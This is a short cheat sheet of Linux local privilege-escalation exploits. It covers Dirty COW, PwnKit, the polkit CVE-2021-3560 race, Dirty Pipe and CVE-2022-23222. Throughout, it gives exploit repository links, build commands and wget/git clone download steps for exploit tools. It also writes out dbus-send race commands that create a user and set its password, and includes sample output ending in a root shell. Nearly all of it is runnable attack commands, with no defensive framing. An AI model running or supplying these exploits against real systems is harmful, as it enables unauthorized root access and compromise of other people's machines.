Linux Dirty COW privilege escalation
https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty -lcrypt
$./dirty passwd
Generate the account password
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s
CVE-2021-4034
https://github.com/berdav/CVE-2021-4034
Just run make and then ./cve-2021-4034 to get a root shell
CVE-2021-3560
Check how long the command takes to execute
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
Terminate it early (run it several times)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
Generate the password
>openssl passwd -5 ignite@123
Execute (run it several times)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash (to get root)
CVE-2022-0847
>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id
or
>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit
CVE-2022-23222
https://github.com/tr3ee/CVE-2022-23222

```bash
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```